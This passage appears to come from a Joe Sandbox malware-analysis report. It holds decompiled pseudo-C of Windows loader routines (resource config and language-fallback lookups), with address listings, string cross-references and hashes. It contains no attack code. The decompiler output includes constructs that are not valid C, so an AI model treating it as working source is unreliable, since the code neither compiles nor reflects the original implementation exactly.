						E34EDFC01(_t209 - 0x50,  *_t110 & 0x000000ff);
						_t185 =  *(_t209 - 0x34);
					} else {
						_t198 = 0x7ffe0384;
					}
					if(_t185 == 0) {
						 *(_t209 - 0x2c) = 0xc000000d;
						goto L8;
					} else {
						if( *((intOrPtr*)(_t209 + 0x18)) == 0) {
							L17:
							__eflags =  *(_t209 + 0xc);
							if( *(_t209 + 0xc) == 0) {
								__eflags =  *(_t209 - 0x3c);
								if(__eflags != 0) {
									goto L18;
								}
								_push(0);
								_push( *(_t209 + 0x14));
								_push(_t209 - 0x38);
								_push(_t185);
								_t117 = L34E5AB70(0, _t198, _t205, __eflags);
								__eflags = _t117;
								if(_t117 >= 0) {
									goto L18;
								}
								L12:
								 *[fs:0x0] =  *((intOrPtr*)(_t209 - 0x10));
								return _t117;
							}
							L18:
							_t201 = E34E5AD00( *(_t209 - 0x34),  *(_t209 - 0x38), _t205 | 0x00200030, _t209 - 0x28, 3, _t209 - 0x30, _t209 - 0x44, 0, 0);
							 *(_t209 - 0x2c) = _t201;
							__eflags = _t201;
							if(_t201 >= 0) {
								 *((intOrPtr*)(_t209 - 4)) = 0;
								_t208 =  *(_t209 - 0x30);
								__eflags =  *(_t209 - 0x3c);
								if( *(_t209 - 0x3c) != 0) {
									L56:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									_t125 =  *(_t209 - 0x40);
									__eflags = _t125;
									if(_t125 != 0) {
										 *_t125 = _t208;
									}
									_t202 = 0;
									 *(_t209 - 0x2c) = 0;
									L23:
									__eflags =  *((char*)(_t209 + 0x18));
									if( *((char*)(_t209 + 0x18)) != 0) {
										__eflags = _t208;
										if(_t208 == 0) {
											_t208 = _t208 | 0xffffffff;
											__eflags = _t208;
										}
										_push(0);
										_push(_t202);
										_push(2);
										_push(0);
										_push(_t208);
										_push(0);
										__eflags = 0;
										E34E593A6(0,  *(_t209 - 0x34), 0, _t202, _t208, 0);
									}
									_t198 = 0x7ffe0384;
									L8:
									_t113 =  *( *[fs:0x30] + 0x50);
									if(_t113 != 0) {
										__eflags =  *_t113;
										if( *_t113 == 0) {
											goto L9;
										}
										_t114 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										L10:
										if(( *_t114 & 0x00000001) != 0) {
											_t115 = E34E63C40();
											__eflags = _t115;
											if(_t115 != 0) {
												_t198 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
												__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											}
											E34EDFC01(_t209 - 0x58,  *_t198 & 0x000000ff);
										}
										_t117 =  *(_t209 - 0x2c);
										goto L12;
									}
									L9:
									_t114 = 0x7ffe0385;
									goto L10;
								}
								_t190 =  *((intOrPtr*)(_t208 + 4));
								__eflags = _t190 + _t208 - ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38);
								if(_t190 + _t208 > ( *(_t209 - 0x34) & 0xfffffffc) +  *(_t209 - 0x38)) {
									_t202 = 0xc000007b;
									 *(_t209 - 0x2c) = 0xc000007b;
									L70:
									 *((intOrPtr*)(_t209 - 4)) = 0xfffffffe;
									L21:
									__eflags = _t202;
									if(_t202 >= 0) {
										_t208 =  *(_t209 - 0x30);
									} else {
										_t208 = 0;
										 *(_t209 - 0x30) = 0;
									}
									goto L23;
								}
								_t202 = 0xc00b0003;
								 *(_t209 - 0x2c) = 0xc00b0003;
								_t168 =  *((intOrPtr*)(_t208 + 0x44));
								_t129 =  *((intOrPtr*)(_t208 + 0x48)) + _t168;
								__eflags = _t129 - _t190;
								if(_t129 > _t190) {
									goto L70;
								}
								__eflags = _t129 - _t168;
								if(_t129 < _t168) {
									goto L70;
								}
								_t169 =  *((intOrPtr*)(_t208 + 0x4c));
								_t131 =  *((intOrPtr*)(_t208 + 0x50)) + _t169;
								__eflags = _t131 - _t190;
								if(_t131 > _t190) {
									goto L70;
								}
								__eflags = _t131 - _t169;
								if(_t131 < _t169) {
									goto L70;
								}
								_t170 =  *((intOrPtr*)(_t208 + 0x54));
								_t133 =  *((intOrPtr*)(_t208 + 0x58)) + _t170;
								__eflags = _t133 - _t190;
								if(_t133 > _t190) {
									goto L70;
								}
								__eflags = _t133 - _t170;
								if(_t133 < _t170) {
									goto L70;
								}
								_t171 =  *((intOrPtr*)(_t208 + 0x5c));
								_t135 =  *((intOrPtr*)(_t208 + 0x60)) + _t171;
								__eflags = _t135 - _t190;
								if(_t135 > _t190) {
									goto L70;
								}
								__eflags = _t135 - _t171;
								if(_t135 < _t171) {
									goto L70;
								}
								_t172 =  *((intOrPtr*)(_t208 + 0x64));
								_t137 =  *((intOrPtr*)(_t208 + 0x68)) + _t172;
								__eflags = _t137 - _t190;
								if(_t137 > _t190) {
									goto L70;
								}
								__eflags = _t137 - _t172;
								if(_t137 < _t172) {
									goto L70;
								}
								_t173 =  *((intOrPtr*)(_t208 + 0x6c));
								_t139 =  *((intOrPtr*)(_t208 + 0x70)) + _t173;
								__eflags = _t139 - _t190;
								if(_t139 > _t190) {
									goto L70;
								}
								__eflags = _t139 - _t173;
								if(_t139 < _t173) {
									goto L70;
								}
								_t174 =  *((intOrPtr*)(_t208 + 0x74));
								_t141 =  *((intOrPtr*)(_t208 + 0x78)) + _t174;
								__eflags = _t141 - _t190;
								if(_t141 > _t190) {
									goto L70;
								}
								__eflags = _t141 - _t174;
								if(_t141 < _t174) {
									goto L70;
								}
								_t175 =  *((intOrPtr*)(_t208 + 0x7c));
								_t143 =  *((intOrPtr*)(_t208 + 0x80)) + _t175;
								__eflags = _t143 - _t190;
								if(_t143 > _t190) {
									goto L70;
								}
								__eflags = _t143 - _t175;
								if(_t143 < _t175) {
									goto L70;
								}
								__eflags =  *_t208 - 0xfecdfecd;
								if( *_t208 != 0xfecdfecd) {
									goto L70;
								}
								__eflags = _t190 -  *((intOrPtr*)(_t209 - 0x44));
								if(_t190 !=  *((intOrPtr*)(_t209 - 0x44))) {
									goto L70;
								}
								__eflags =  *((intOrPtr*)(_t208 + 8)) - 0x10000;
								if( *((intOrPtr*)(_t208 + 8)) != 0x10000) {
									goto L70;
								}
								_t176 =  *(_t208 + 0xc);
								__eflags =  *(_t208 + 0xc);
								if( *(_t208 + 0xc) != 0) {
									_t191 = 7;
									_t144 = E34E8B95A(_t176, _t191);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L70;
									}
								}
								_t192 = 3;
								_t145 = E34E8B95A( *(_t208 + 0x10) & 0xffffffcf, _t192);
								__eflags = _t145;
								if(_t145 == 0) {
									goto L70;
								}
								_t193 = 0x30;
								_t146 = E34E8B95A( *(_t208 + 0x10) & 0xfffffffc, _t193);
								__eflags = _t146;
								if(_t146 == 0) {
									goto L70;
								}
								__eflags =  *(_t208 + 0x10) & 0x00000001;
								if(( *(_t208 + 0x10) & 0x00000001) == 0) {
									L55:
									 *(_t209 - 0x2c) = 0;
									goto L56;
								}
								_t194 = 3;
								_t147 = E34E8B95A( *((intOrPtr*)(_t208 + 0x18)), _t194);
								__eflags = _t147;
								if(_t147 == 0) {
									goto L70;
								}
								_t182 =  *(_t208 + 0x14);
								__eflags =  *(_t208 + 0x14);
								if( *(_t208 + 0x14) != 0) {
									_t148 = E34E8B95A(_t182, 0x100);
									__eflags = _t148;
									if(_t148 == 0) {
										goto L70;
									}
								}
								goto L55;
							}
							__eflags = _t201 - 0xc000007b;
							if(_t201 != 0xc000007b) {
								_t202 = 0xc000008a;
								 *(_t209 - 0x2c) = 0xc000008a;
							}
							goto L21;
						}
						_t150 = E34E5D530( *(_t209 - 0x34), 0, 0, 8);
						 *(_t209 - 0x30) = _t150;
						if(_t150 != 0xffffffff) {
							__eflags = _t150;
							if(_t150 == 0) {
								_t185 =  *(_t209 - 0x34);
								goto L17;
							} else {
								 *(_t209 - 0x2c) = 0;
								_t184 =  *(_t209 - 0x40);
								__eflags = _t184;
								if(_t184 != 0) {
									 *_t184 = _t150;
								}
								goto L8;
							}
						} else {
							 *(_t209 - 0x2c) = 0xc000008a;
							goto L8;
						}
					}
				}
				L1:
				_t108 = 0x7ffe0385;
				goto L2;
			}

0x34e5b5e0
0x34e5b5e2
0x34e5b5e7
0x34e5b5ec
0x34e5b5ef
0x34e5b5f5
0x34e5b5f8
0x34e5b5ff
0x34e5b608
0x34e5b60e
0x34e5b611
0x34e5b616
0x34e5b617
0x34e5b61d
0x34e5b61e
0x34e5b622
0x34e5b62b
0x34e5b62c
0x34e5b630
0x34e5b634
0x34e5b643
0x34e5b648
0x34e5b651
0x34e5b659
0x34e5b65e
0x34eb363b
0x34eb363d
0x00000000
0x00000000
0x34eb364c
0x34e5b669
0x34e5b66c
0x34eb3656
0x34eb365b
0x34eb3660
0x34eb3662
0x34eb3674
0x34eb3664
0x34eb366d
0x34eb366d
0x34eb367c
0x34eb3681
0x34e5b672
0x34e5b672
0x34e5b672
0x34e5b679
0x34eb3689
0x00000000
0x34e5b67f
0x34e5b682
0x34e5b6e9
0x34e5b6e9
0x34e5b6ec
0x34e5b8ee
0x34e5b8f1
0x00000000
0x00000000
0x34e5b8f7
0x34e5b8f8
0x34e5b8fe
0x34e5b8ff
0x34e5b900
0x34e5b905
0x34e5b907
0x00000000
0x00000000
0x34e5b6c2
0x34e5b6c5
0x34e5b6d1
0x34e5b6d1
0x34e5b6f2
0x34e5b714
0x34e5b716
0x34e5b719
0x34e5b71b
0x34e5b762
0x34e5b765
0x34e5b768
0x34e5b76c
0x34e5b8d4
0x34e5b8d4
0x34e5b8db
0x34e5b8de
0x34e5b8e0
0x34e5b8e2
0x34e5b8e2
0x34e5b8e4
0x34e5b8e6
0x34e5b73a
0x34e5b73a
0x34e5b73e
0x34e5b740
0x34e5b742
0x34e5b744
0x34e5b744
0x34e5b744
0x34e5b747
0x34e5b748
0x34e5b749
0x34e5b74b
0x34e5b74c
0x34e5b74d
0x34e5b74e
0x34e5b753
0x34e5b753
0x34e5b758
0x34e5b6a0
0x34e5b6a6
0x34e5b6ab
0x34eb36f3
0x34eb36f6
0x00000000
0x00000000
0x34eb3705
0x34e5b6b6
0x34e5b6b9
0x34eb370f
0x34eb3714
0x34eb3716
0x34eb3721
0x34eb3721
0x34eb3721
0x34eb372d
0x34eb372d
0x34e5b6bf
0x00000000
0x34e5b6bf
0x34e5b6b1
0x34e5b6b1
0x00000000
0x34e5b6b1
0x34e5b772
0x34e5b781
0x34e5b783
0x34eb3695
0x34eb369a
0x34eb36ad
0x34eb36ad
0x34e5b72d
0x34e5b72d
0x34e5b72f
0x34eb36eb
0x34e5b735
0x34e5b735
0x34e5b737
0x34e5b737
0x00000000
0x34e5b72f
0x34e5b789
0x34e5b78e
0x34e5b791
0x34e5b797
0x34e5b799
0x34e5b79b
0x00000000
0x00000000
0x34e5b7a1
0x34e5b7a3
0x00000000
0x00000000
0x34e5b7a9
0x34e5b7af
0x34e5b7b1
0x34e5b7b3
0x00000000
0x00000000
0x34e5b7b9
0x34e5b7bb
0x00000000
0x00000000
0x34e5b7c1
0x34e5b7c7
0x34e5b7c9
0x34e5b7cb
0x00000000
0x00000000
0x34e5b7d1
0x34e5b7d3
0x00000000
0x00000000
0x34e5b7d9
0x34e5b7df
0x34e5b7e1
0x34e5b7e3
0x00000000
0x00000000
0x34e5b7e9
0x34e5b7eb
0x00000000
0x00000000
0x34e5b7f1
0x34e5b7f7
0x34e5b7f9
0x34e5b7fb
0x00000000
0x00000000
0x34e5b801
0x34e5b803
0x00000000
0x00000000
0x34e5b809
0x34e5b80f
0x34e5b811
0x34e5b813
0x00000000
0x00000000
0x34e5b819
0x34e5b81b
0x00000000
0x00000000
0x34e5b821
0x34e5b827
0x34e5b829
0x34e5b82b
0x00000000
0x00000000
0x34e5b831
0x34e5b833
0x00000000
0x00000000
0x34e5b839
0x34e5b842
0x34e5b844
0x34e5b846
0x00000000
0x00000000
0x34e5b84c
0x34e5b84e
0x00000000
0x00000000
0x34e5b854
0x34e5b85a
0x00000000
0x00000000
0x34e5b860
0x34e5b863
0x00000000
0x00000000
0x34e5b869
0x34e5b870
0x00000000
0x00000000
0x34e5b876
0x34e5b879
0x34e5b87b
0x34eb36bb
0x34eb36bc
0x34eb36c1
0x34eb36c3
0x00000000
0x00000000
0x34eb36c5
0x34e5b889
0x34e5b88a
0x34e5b88f
0x34e5b891
0x00000000
0x00000000
0x34e5b89f
0x34e5b8a0
0x34e5b8a5
0x34e5b8a7
0x00000000
0x00000000
0x34e5b8ad
0x34e5b8b1
0x34e5b8d1
0x34e5b8d1
0x00000000
0x34e5b8d1
0x34e5b8b5
0x34e5b8b9
0x34e5b8be
0x34e5b8c0
0x00000000
0x00000000
0x34e5b8c6
0x34e5b8c9
0x34e5b8cb
0x34eb36cf
0x34eb36d4
0x34eb36d6
0x00000000
0x00000000
0x34eb36d8
0x00000000
0x34e5b8cb
0x34e5b71d
0x34e5b723
0x34e5b725
0x34e5b72a
0x34e5b72a
0x00000000
0x34e5b723
0x34e5b68c
0x34e5b691
0x34e5b697
0x34e5b6d4
0x34e5b6d6
0x34e5b6e6
0x00000000
0x34e5b6d8
0x34e5b6d8
0x34e5b6db
0x34e5b6de
0x34e5b6e0
0x34e5b6e2
0x34e5b6e2
0x00000000
0x34e5b6e0
0x34e5b699
0x34e5b699
0x00000000
0x34e5b699
0x34e5b697
0x34e5b679
0x34e5b664
0x34e5b664
0x00000000

Strings

LdrResGetRCConfig Enter, xrefs: 34E5B622
LU4, xrefs: 34E5B704, 34E5B707
LdrResGetRCConfig Exit, xrefs: 34E5B634
MUI, xrefs: 34E5B5F8

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: LU4$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1374999698
Opcode ID: 5a4923f5ff3b34470c6b0f68e44d82ac6f42239195c1d04b98792c1082dc4315
Instruction ID: b182f1a8627ab50758d8253add420c8af1a9462894a8ee22119b9fb60ae10dbc
Opcode Fuzzy Hash: 5a4923f5ff3b34470c6b0f68e44d82ac6f42239195c1d04b98792c1082dc4315
Instruction Fuzzy Hash: 4DB1A875A14705DFEB14CF68C891B9EB3B5AF44798F20896DE891EB3A4D7B0E840CB40

Uniqueness

Uniqueness Score: -1.00%

Function 34E5A2E0 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E34E5A2E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed short* _a12) {
				char _v12;
				char* _v16;
				char _v20;
				char* _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v81;
				signed int _v84;
				void* _v88;
				void* _v89;
				signed short _v92;
				char _v93;
				void* _v100;
				void* _v101;
				intOrPtr* _t122;
				signed char* _t123;
				signed char* _t125;
				intOrPtr* _t128;
				signed char* _t129;
				signed char* _t131;
				intOrPtr _t133;
				signed int _t139;
				signed short* _t159;
				intOrPtr _t163;
				signed int _t178;
				signed int _t183;

				_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_v48 = __edx;
				_v52 = __ecx;
				_v64 = 0;
				_v28 = 0x3a0038;
				_v24 = L"LdrResFallbackLangList Enter";
				_v20 = 0x380036;
				_v16 = L"LdrResFallbackLangList Exit";
				if(_t122 != 0) {
					if( *_t122 == 0) {
						goto L1;
					}
					_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t123 & 0x00000001) != 0) {
						if(E34E63C40() == 0) {
							_t125 = 0x7ffe0384;
						} else {
							_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E34EDFC01( &_v28,  *_t125 & 0x000000ff);
					}
					_t159 = _a12;
					if(_t159 == 0) {
						_t163 = 0xc000000d;
						_v68 = 0xc000000d;
						goto L35;
					} else {
						_t183 = 0;
						 *_t159 = 0;
						_t159[0x102] = 0;
						_v60 = 0;
						_v68 = 0;
						_v81 = 0;
						_v56 = 0;
						while(1) {
							L5:
							_v72 = 0;
							while(1) {
								L6:
								_t139 = _t183;
								_t178 = _t183;
								_t183 = _t183 + 1;
								if(_t139 > 7) {
									break;
								}
								switch( *((intOrPtr*)(_t139 * 4 +  &M34E5A60C))) {
									case 0:
										__ax = _a4;
										_v64 = 1;
										goto L14;
									case 1:
										if((_a8 & 0x00000004) != 0) {
											 *((char*)(__ebx + 0x204)) = 1;
											goto L34;
										}
										if((_a4 & 0x000003ff) != 0) {
											__edx =  &_v76;
											 *((char*)(__ebx + 0x204)) = 1;
											if(E34E488C8(__ecx, __edx) < 0) {
												goto L34;
											}
											__ax = _v76;
											_v72 = __ax;
											__eax = _v72;
											if(__ax != 0) {
												__esi = __edi;
											} else {
												__esi = __esi | 0xffffffff;
											}
											L30:
											_v64 = 2;
											goto L15;
										}
										__eax = 0xeeee;
										_v72 = 0xeeee;
										goto L30;
									case 2:
										_v80 = 0;
										if(E34E5A630() == 0) {
											goto L24;
										}
										_t166 = _v60;
										if(_v60 >= ( *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff)) {
											goto L24;
										}
										E34E5A750( *( *[fs:0x18] + 0xfc0), _t166,  &_v80,  &_v81);
										_t149 = _v92 & 0x0000ffff;
										_v84 = _t149;
										if(_t149 == 0) {
											goto L24;
										}
										if(_v81 != 0) {
											if((_a8 & 0x00100000) != 0) {
												_v72 = 0xeeee;
												_t149 = _v72;
											}
										}
										_v60 = _v60 + 1;
										_t183 = _t178;
										_v64 = 3;
										goto L15;
									case 3:
										__eax = _v52;
										if(__eax == 0) {
											L24:
											_v72 = 0xeeee;
											goto L6;
										}
										__edx = _v48;
										 &_v36 =  &_v44;
										__ecx = __eax;
										__eax = E34E5A1E3(__ecx, __edx,  &_v44,  &_v36, _a8);
										if(__eax >= 0) {
											 &_v12 = E34E95050(__ecx,  &_v12, _v44);
											 &_v48 =  &_v20;
											__eax = E34E756E0( &_v20,  &_v48);
											if(__al == 0) {
												_v68 = 0xc00b0005;
												goto L24;
											}
											__ax =  *((intOrPtr*)(__esp + 0x3c));
											_v72 = __eax;
											_v80 = __ax;
											if((_a8 & 0x00100000) != 0) {
												__edx =  *[fs:0x18];
												 &_v81 =  &_v80;
												__edx =  *( *[fs:0x18] + 0xfc0);
												__eax = E34E5A750(__edx, 0,  &_v80,  &_v81);
												if(_v93 == 0) {
													__ax = _v80;
													_v72 = __eax;
												} else {
													__eax = 0xeeee;
													_v72 = __ax;
												}
											}
											__eax = _v36;
											__al = __al & 0x00000001;
											__al & 0x000000ff =  ~(__al & 0x000000ff);
											asm("sbb eax, eax");
											 ~(__al & 0x000000ff) & 0x00000006 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											_v64 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											__eax = _v72;
											goto L15;
										}
										goto L24;
									case 4:
										__eax = 0xeeee;
										_v80 = __ax;
										__eax = _a8;
										__eax =  !_a8;
										if((__eax & 0x00080000) != 0) {
											goto L34;
										}
										if( *[fs:0x18] == 0) {
											__ax = _v80;
											goto L5;
										}
										__eax =  *[fs:0x18];
										__ax =  *((intOrPtr*)(__eax + 0xc4));
										goto L14;
									case 5:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v56;
										_push( &_v56);
										_push(1);
										__eax = E34E92AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__ax = _v56;
										goto L14;
									case 6:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v32;
										_push( &_v32);
										_push(0);
										__eax = E34E92AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__eax = _v32;
										if(__eax == _v56) {
											goto L6;
										}
										L14:
										_v72 = __eax;
										L15:
										if(_t149 == 0xeeee) {
											goto L6;
										}
										goto L16;
									case 7:
										__eax = 0x409;
										_v72 = __ax;
										L16:
										_t179 =  *_t159 & 0x0000ffff;
										_t168 = 0;
										_t175 = _t179;
										if(_t175 == 0) {
											L20:
											if(_t179 >= 0x40) {
												goto L34;
											}
											 *((short*)(_t159 + 4 + _t175 * 8)) = _v72;
											 *(_t159 + 8 + ( *_t159 & 0x0000ffff) * 8) = _v64;
											 *_t159 =  *_t159 + 1;
											goto L6;
										} else {
											_t152 =  &(_t159[2]);
											while(1) {
												_t179 =  *_t159 & 0x0000ffff;
												if( *_t152 == _v72) {
													break;
												}
												_t168 = _t168 + 1;
												_t152 =  &(_t152[4]);
												if(_t168 < _t175) {
													continue;
												}
												goto L20;
											}
											if(_t168 < _t175) {
												goto L6;
											}
											goto L20;
										}
								}
							}
							L34:
							_t163 = _v68;
							L35:
							_t128 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t128 != 0) {
								if( *_t128 == 0) {
									goto L36;
								}
								_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								L37:
								if(( *_t129 & 0x00000001) != 0) {
									if(E34E63C40() == 0) {
										_t131 = 0x7ffe0384;
									} else {
										_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									}
									E34EDFC01( &_v20,  *_t131 & 0x000000ff);
									_t133 = _v68;
								} else {
									_t133 = _t163;
								}
								return _t133;
							}
							L36:
							_t129 = 0x7ffe0385;
							goto L37;
						}
					}
				}
				L1:
				_t123 = 0x7ffe0385;
				goto L2;
			}

0x34e5a2f4
0x34e5a2f7
0x34e5a2fb
0x34e5a2ff
0x34e5a307
0x34e5a30f
0x34e5a317
0x34e5a31f
0x34e5a329
0x34eb29f7
0x00000000
0x00000000
0x34eb2a06
0x34e5a334
0x34e5a337
0x34eb2a17
0x34eb2a29
0x34eb2a19
0x34eb2a22
0x34eb2a22
0x34eb2a35
0x34eb2a35
0x34e5a33d
0x34e5a342
0x34eb2a3f
0x34eb2a44
0x00000000
0x34e5a348
0x34e5a34a
0x34e5a34e
0x34e5a351
0x34e5a357
0x34e5a35b
0x34e5a35f
0x34e5a363
0x34e5a367
0x34e5a367
0x34e5a367
0x34e5a370
0x34e5a370
0x34e5a370
0x34e5a372
0x34e5a374
0x34e5a378
0x00000000
0x00000000
0x34e5a37e
0x00000000
0x34e5a3ff
0x34e5a403
0x00000000
0x00000000
0x34e5a4af
0x34eb2b05
0x00000000
0x34eb2b05
0x34e5a4bc
0x34eb2a52
0x34eb2a56
0x34eb2a64
0x00000000
0x00000000
0x34eb2a6a
0x34eb2a6f
0x34eb2a77
0x34eb2a7b
0x34eb2a85
0x34eb2a7d
0x34eb2a7d
0x34eb2a7d
0x34e5a4cb
0x34e5a4cb
0x00000000
0x34e5a4cb
0x34e5a4c2
0x34e5a4c7
0x00000000
0x00000000
0x34e5a387
0x34e5a393
0x00000000
0x00000000
0x34e5a39f
0x34e5a3af
0x00000000
0x00000000
0x34e5a3cd
0x34e5a3d2
0x34e5a3d7
0x34e5a3de
0x00000000
0x00000000
0x34e5a3e9
0x34eb2a93
0x34eb2a9e
0x34eb2aa3
0x34eb2aa3
0x34eb2a93
0x34e5a3ef
0x34e5a3f3
0x34e5a3f5
0x00000000
0x00000000
0x34e5a46a
0x34e5a470
0x34e5a492
0x34e5a497
0x00000000
0x34e5a497
0x34e5a475
0x34e5a47e
0x34e5a483
0x34e5a485
0x34e5a48c
0x34e5a5b5
0x34e5a5bf
0x34e5a5c4
0x34e5a5cb
0x34eb2aee
0x00000000
0x34eb2aee
0x34e5a5d8
0x34e5a5dd
0x34e5a5e1
0x34e5a5e6
0x34eb2aac
0x34eb2ab8
0x34eb2abd
0x34eb2ac5
0x34eb2acf
0x34eb2ae0
0x34eb2ae5
0x34eb2ad1
0x34eb2ad1
0x34eb2ad6
0x34eb2ad6
0x34eb2acf
0x34e5a5ec
0x34e5a5f0
0x34e5a5f5
0x34e5a5f7
0x34e5a5fc
0x34e5a5ff
0x34e5a603
0x00000000
0x34e5a603
0x00000000
0x00000000
0x34e5a4d8
0x34e5a4dd
0x34e5a4e2
0x34e5a4e5
0x34e5a4ec
0x00000000
0x00000000
0x34e5a4f6
0x34eb2afb
0x00000000
0x34eb2afb
0x34e5a4fc
0x34e5a502
0x00000000
0x00000000
0x34e5a53c
0x34e5a541
0x34e5a546
0x34e5a54a
0x34e5a54b
0x34e5a54d
0x34e5a552
0x34e5a558
0x00000000
0x00000000
0x34e5a55e
0x00000000
0x00000000
0x34e5a568
0x34e5a56d
0x34e5a572
0x34e5a576
0x34e5a577
0x34e5a579
0x34e5a57e
0x34e5a584
0x00000000
0x00000000
0x34e5a58a
0x34e5a592
0x00000000
0x00000000
0x34e5a40b
0x34e5a40b
0x34e5a40f
0x34e5a417
0x00000000
0x00000000
0x00000000
0x00000000
0x34e5a59d
0x34e5a5a2
0x34e5a41d
0x34e5a41d
0x34e5a420
0x34e5a422
0x34e5a426
0x34e5a444
0x34e5a448
0x00000000
0x00000000
0x34e5a456
0x34e5a45e
0x34e5a462
0x00000000
0x34e5a428
0x34e5a428
0x34e5a430
0x34e5a437
0x34e5a43a
0x00000000
0x00000000
0x34e5a43c
0x34e5a43d
0x34e5a442
0x00000000
0x00000000
0x00000000
0x34e5a442
0x34e5a4a3
0x00000000
0x00000000
0x00000000
0x34e5a4a9
0x00000000
0x34e5a37e
0x34e5a50e
0x34e5a50e
0x34e5a512
0x34e5a518
0x34e5a51d
0x34eb2b14
0x00000000
0x00000000
0x34eb2b23
0x34e5a528
0x34e5a52b
0x34eb2b34
0x34eb2b46
0x34eb2b36
0x34eb2b3f
0x34eb2b3f
0x34eb2b52
0x34eb2b57
0x34e5a531
0x34e5a531
0x34e5a531
0x34e5a539
0x34e5a539
0x34e5a523
0x34e5a523
0x00000000
0x34e5a523
0x34e5a367
0x34e5a342
0x34e5a32f
0x34e5a32f
0x00000000

Strings

LdrResFallbackLangList Exit, xrefs: 34E5A31F
LdrResFallbackLangList Enter, xrefs: 34E5A30F
8, xrefs: 34E5A307
6, xrefs: 34E5A317

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 2d178ec963c0a85a8559d0ccd279cadee0c259e8153dbd7fae01beedd69c9676
Instruction ID: 1e3c42516c094c9e0aed8d24d4445da90179ccf57c131a1403393720f01db276
Opcode Fuzzy Hash: 2d178ec963c0a85a8559d0ccd279cadee0c259e8153dbd7fae01beedd69c9676
Instruction Fuzzy Hash: B8C19E74608382CFE711CF54C544B6AB7E8FF85748F0049AEF8959B660EB34CA46CB96

Uniqueness

Uniqueness Score: -1.00%

Function 34E8265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E34E8265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x34f4b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x34e2120c) {
					E34EDEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return L34E94B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E34EDEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
